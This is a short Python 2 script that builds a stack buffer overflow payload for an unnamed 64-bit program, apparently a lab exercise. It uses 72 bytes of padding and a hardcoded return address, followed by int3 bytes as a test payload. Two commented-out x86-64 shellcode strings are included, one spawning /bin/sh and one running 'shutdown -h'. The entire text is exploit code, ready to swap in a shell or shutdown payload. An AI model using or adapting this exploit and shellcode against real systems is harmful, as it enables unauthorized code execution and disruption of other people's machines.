import struct
 
 # This is for a 64 bit architecture
 
 # 64 bytes for the character array plus 1 byte for the LEAVE
 # instruction this should take us to the RETURN instruction
 padding = "\x00"*72
 
 # Point the instruction pointer after the LEAVE instruction
 eip = struct.pack("Q", 0x00007fffffffdc20)
 
 # NOP slide to correct the runtime variable variance
 # nopslide = "\x90" * 100
 nopslide = ""
 
 # Trip the code into the intel CPU debugger (also known as int3),
 # prevents a segmentation fault from halting the application
 # to verify we have successfully caused a buffer overflow without
 # crashing the application
 payload = "\xCC" * 8
 
 # /bin/sh
 # payload = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
 
 # shutdown -h
 # payload = "\x48\x31\xc0\x48\x31\xd2\x50\x6a\x77\x66\x68\x6e\x6f\x48\x89\xe3\x50\x66\x68\x2d\x68\x48\x89\xe1\x50\x49\xb8\x2f\x73\x62\x69\x6e\x2f\x2f\x2f\x49\xba\x73\x68\x75\x74\x64\x6f\x77\x6e\x41\x52\x41\x50\x48\x89\xe7\x52\x53\x51\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
 
 print padding + eip + nopslide + payload